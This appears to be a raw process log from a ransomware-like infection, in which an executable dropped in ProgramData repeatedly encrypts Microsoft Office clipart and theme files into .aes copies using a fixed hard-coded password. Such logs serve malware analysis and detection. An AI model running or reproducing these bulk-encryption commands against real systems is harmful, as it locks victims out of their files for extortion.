C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe
